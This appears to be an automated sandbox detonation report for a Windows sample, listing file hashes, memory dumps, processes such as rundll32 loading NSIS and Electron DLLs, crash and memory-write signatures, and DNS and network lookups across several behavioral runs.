| SHA512 | ebb313e80cb3a1cfeac5426add8d3f7e4cff266d104b7184188e47dfa9bc49b5f415baefe026861c97781b27dbdf87b6d50740b8bfce3b746a5748ef8ac040e6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | ab3c4432db5fdce973f6b0b6fc166288 |
| SHA1 | 2e801d80501729fbe4326afef818dea008d7b2b5 |
| SHA256 | 35affc911c9f1b6a6e0bacdb9fcec7908545a5c78c5cf8f1f37ca90d1b7a7604 |
| SHA512 | f5821684b34835c142bebf41165b9e633f94817ea7c838a7eec0bb02a2319ed862f682aca463f6e05209485ebc021d7b650c7e077bbc605ebd440512e6c9dcec |
memory/11812-818-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
memory/11812-819-0x0000025EE0D10000-0x0000025EE0D20000-memory.dmp
memory/11812-820-0x0000025EE0D10000-0x0000025EE0D20000-memory.dmp
memory/11812-817-0x0000025EE0CD0000-0x0000025EE0CF2000-memory.dmp
memory/11812-823-0x0000025EE0FA0000-0x0000025EE1016000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nn52gymf.kwy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/11812-844-0x0000025EE0D10000-0x0000025EE0D20000-memory.dmp
memory/11812-845-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
memory/8092-854-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
memory/8092-855-0x00000178FDE20000-0x00000178FDE30000-memory.dmp
memory/8092-856-0x00000178FDE20000-0x00000178FDE30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1379f67f98d7623048b018096b5fe6f4 |
| SHA1 | 40521f423f992409e7173f89a5c259cb29559e66 |
| SHA256 | 92381e78bf8cc44497bc5fde361243c2259ba48aa3340507484c298d3a60b04d |
| SHA512 | 37913d2c4777ce6e190d506e4f0f9c8dd64bb90ea55ca92e2a295982284249bba402682750f084772bc86f3732358f1dc4ae290118d773cf8487f09744893ace |
memory/8092-878-0x00000178FDE20000-0x00000178FDE30000-memory.dmp
memory/8092-879-0x00007FFD86140000-0x00007FFD86B2C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 222abf9d6d1375d87e4892aa6b69d447 |
| SHA1 | 8bf79b9208aa821721d72b17c05c51616bdc5cbb |
| SHA256 | 530fa79ce030473d1d1f54ad61bab89862c2d23fa249fc0538562ab686741e52 |
| SHA512 | fc7f68ad67a81f4e6995b8cd124f7dfe680360da1b5b250efdb319d05dc12791ac443c5610857ebd11a75a38e991ea1021017b19ec2623fdf2cae90507145df1 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0htfzopy.default-release\cache2\doomed\493
| MD5 | 89d97365d726e11d2da115db5178dca0 |
| SHA1 | 0f26e7ed43e864f3bfd1784bfd9d727938997021 |
| SHA256 | 669e2ce97f19bfa510448693de5c81816a44d3b86deb470e4fa87e81dc19fe94 |
| SHA512 | ec769b3d8d66849daa208bfc4b553b1dabdb7224056ea8c361015df403bb35ecd1694ba16ef1e844107ca80ebf02377bd6849243b3ca1c99315d6111650d5d73 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 07fa1e0cbb433ec2a9fd6268235e19df |
| SHA1 | 80472ab0a78c76b3c4fcc31d5778c78d49299f8d |
| SHA256 | 65bdfb7e99491177e064cdb45034a7eae71d258699a00a90f991264cb8fd15a4 |
| SHA512 | 79c2edfb12f695be91539e280dec0ab1d09728c27778715a8f7ad1804831057067e2d32cfe026a6837bc99105317724acddae4ab647347381fe44da40f26b5e2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\storage\default\https+++www.wildtangent.com\idb\3619119340leogcaarlof.sqlite
| MD5 | d4923b8b9160853084a0196eab4236ea |
| SHA1 | 95a0175a70549d5da177f774d9c19b8f7ae7ce90 |
| SHA256 | a090a8979a2198c29faf26421a148a92631e0c19fce0024016e69999d8f2832e |
| SHA512 | 727cd88e71c582e38d82ca00f5c21d94bdca45554533fc2e37240bda90f8b24aabca4a3a5bbfe806ee42b84dabd6f1612042ade771741c066614c95b8139200f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\storage\default\https+++www.wildtangent.com\idb\3619119340leogcaarlof.sqlite
| MD5 | ac9b2eeb65ceb57e483331f1f50f20a5 |
| SHA1 | 5534936b9e8b1dcfc3d369cb0da53b0703afd449 |
| SHA256 | 904a1fb37865bb9cb223e12990a61d9ed4272b5442030b69cb4e6eb9c1901cba |
| SHA512 | eed9f6bc1727319f6125d7c77654dd0f7e03fd9dfa3c4a4acc0dd4594e7bb09e672e935cc286910aada005437dc99658738355d2a39566e7619ed3035c03be94 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 40cb4085b5bb8ecd454947c8d09b1355 |
| SHA1 | 4dddc3e8198f052f4c5fb07604dd5a1828a7f7a5 |
| SHA256 | 85bf516acc97bf670024432a29a25c66797ffd29e1287906db010e3c5a34157c |
| SHA512 | 6f31593d4e856590a1449ef3204e3a1f83c566aebcd3ba1c74382141ae3225245782ef7dad43be7397ac64ed542a474e527a11b471f34bbbd9806cacd2c3f932 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0htfzopy.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 711b4a52982dc1a5452b5ed75affe2ef |
| SHA1 | c7c65ca134eff09391157ac1caa6470d6e5953b0 |
| SHA256 | 87b13e1fb8c770b981346c10e37b4197d1a64980efa55aa68dfc07da45c940c4 |
| SHA512 | d43824b0add2f70ace94dec1156241eef6d12837b77e1ea89d6a1e20e1ff62a789f017a073b070e6e28a778b8e6af192c741a300bbb99fd3a237902995812721 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0htfzopy.default-release\jumpListCache\X2mmvihH0fvI97fUoVttDQ==.ico
| MD5 | 42ed60b3ba4df36716ca7633794b1735 |
| SHA1 | c33aa40eed3608369e964e22c935d640e38aa768 |
| SHA256 | 6574e6e55f56eca704a090bf08d0d4175a93a5353ea08f8722f7c985a39a52c8 |
| SHA512 | 4247460a97a43ce20d536fdd11d534b450b075c3c28cd69fc00c48bdf7de1507edb99bef811d4c61bed10f64e4c788ee4bdc58c7c72d3bd160b9b4bd696e3013 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
127s
Max time network
140s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4532 wrote to memory of 3680 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4532 wrote to memory of 3680 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4532 wrote to memory of 3680 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 628
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.238.56.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
131s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:48
Platform
win10-20240221-en
Max time kernel
123s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
133s
Max time network
140s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
127s
Max time network
139s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3004 wrote to memory of 2324 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3004 wrote to memory of 2324 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3004 wrote to memory of 2324 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 636
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 112.118.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:48
Platform
win10-20240221-en
Max time kernel
121s
Max time network
143s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 112.118.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |